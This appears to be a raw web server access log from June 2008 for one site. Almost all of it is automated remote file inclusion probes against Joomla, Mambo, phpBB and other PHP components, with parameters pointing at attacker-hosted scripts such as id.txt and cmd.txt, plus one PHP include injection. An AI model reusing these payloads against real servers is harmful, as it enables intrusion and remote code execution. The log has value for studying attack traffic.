74.52.66.242 - - [11/Jun/2008:11:58:17 -0700] "GET /logs/access_080117.log//modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:11:58:21 -0700] "GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.0" 200 18511 "-" "Mozilla/5.0" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:11:58:31 -0700] "GET /logs/access_080228.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:58:35 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:58:36 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:58:37 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.19.213 - - [11/Jun/2008:11:58:42 -0700] "GET /logs/access_080219.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://durhaka.100webspace.net/alat/echo1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:11:58:43 -0700] "GET /logs/access.log/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:11:58:43 -0700] "GET /index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:11:58:43 -0700] "GET /logs/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.188.13 - - [11/Jun/2008:11:59:25 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://swzx.jlu.edu.cn/test/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [11/Jun/2008:11:59:26 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://swzx.jlu.edu.cn/test/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [11/Jun/2008:11:59:26 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://swzx.jlu.edu.cn/test/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [11/Jun/2008:11:59:47 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://swzx.jlu.edu.cn/test/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.89.107 - - [11/Jun/2008:12:00:18 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.52.136.89 - - [11/Jun/2008:12:00:32 -0700] "GET /logs/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.170 - - [11/Jun/2008:12:00:47 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [11/Jun/2008:12:00:47 -0700] "GET /errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [11/Jun/2008:12:00:47 -0700] "GET /logs/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:01:00 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:01:00 -0700] "GET /errors.php?error=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:01:00 -0700] "GET /logs/errors.php?error=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [11/Jun/2008:12:01:46 -0700] "GET /logs/access_080501.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [11/Jun/2008:12:01:46 -0700] "GET //index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [11/Jun/2008:12:01:46 -0700] "GET /logs//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:01:47 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:01:47 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:01:48 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:12:01:52 -0700] "GET /logs/access_080106.log/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.55.90.2 - - [11/Jun/2008:12:02:00 -0700] "GET /logs/access_080322.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.mondocitta.net/.htaccess_/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [11/Jun/2008:12:02:00 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.mondocitta.net/.htaccess_/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [11/Jun/2008:12:02:01 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.mondocitta.net/.htaccess_/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:02:06 -0700] "GET /logs/access_071211.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:02:11 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:02:17 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:02:18 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:02:18 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.188 - - [11/Jun/2008:12:02:21 -0700] "GET /logs/access_080329.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:12:02:26 -0700] "GET /logs/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:12:02:26 -0700] "GET /index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:12:02:41 -0700] "GET /logs/access_080106.log/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:12:02:47 -0700] "GET /logs/access_080106.log/components/com_joomlaboard/image_upload.php?sbp=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:12:02:49 -0700] "GET /logs/access_080418.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:02:59 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:03:00 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:03:00 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:03:00 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:03:10 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:03:14 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:03:14 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:03:15 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.11.60 - - [11/Jun/2008:12:03:21 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://super4host.com/images/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.11.60 - - [11/Jun/2008:12:03:21 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://super4host.com/images/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:03:27 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.55.90.2 - - [11/Jun/2008:12:03:27 -0700] "GET /logs/access_080322.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:03:28 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.55.90.2 - - [11/Jun/2008:12:03:28 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:03:28 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.55.90.2 - - [11/Jun/2008:12:03:28 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
203.200.89.107 - - [11/Jun/2008:12:03:33 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.200.89.107 - - [11/Jun/2008:12:03:39 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:03:42 -0700] "GET /logs/access_071211.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.200.89.107 - - [11/Jun/2008:12:03:44 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:03:47 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:03:47 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:03:48 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:12:03:48 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:03:51 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:04:08 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:12:04:10 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:04:18 -0700] "GET /logs/access.log/index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:04:18 -0700] "GET /index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:04:18 -0700] "GET /logs/index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:04:23 -0700] "GET /logs/access_080225.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:12:04:58 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:12:04:58 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:12:04:59 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:12:05:03 -0700] "GET /logs/access_080312.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:12:05:03 -0700] "GET /logs/access_080312.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:12:05:04 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:12:05:04 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:12:05:04 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:12:05:05 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:12:05:11 -0700] "GET /logs/access_080507.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:05:23 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 200 18519 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:05:23 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:12:05:24 -0700] "GET /logs/access_080106.log/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:12:05:58 -0700] "GET /logs/index2.php?page=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:12:05:58 -0700] "GET /index2.php?page=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:12:06:45 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:12:06:45 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:12:06:45 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:12:06:51 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:12:06:51 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:07:04 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:07:06 -0700] "GET //index.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 200 18473 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:12:07:37 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:12:07:37 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:12:07:37 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:07:38 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:07:38 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:07:38 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:07:40 -0700] "GET /logs/access_080312.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:12:07:50 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:07:53 -0700] "GET //language.inc.php?langs_dir=http://www.geocities.cm/paijoe_emo/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.171.18.36 - - [11/Jun/2008:12:07:56 -0700] "GET /logs/access_080207.log//errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [11/Jun/2008:12:07:57 -0700] "GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [11/Jun/2008:12:07:57 -0700] "GET /logs//errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:08:09 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:08:16 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:08:16 -0700] "GET /errors.php?error=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:08:16 -0700] "GET /logs/errors.php?error=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:08:24 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:08:42 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:09:11 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:09:13 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
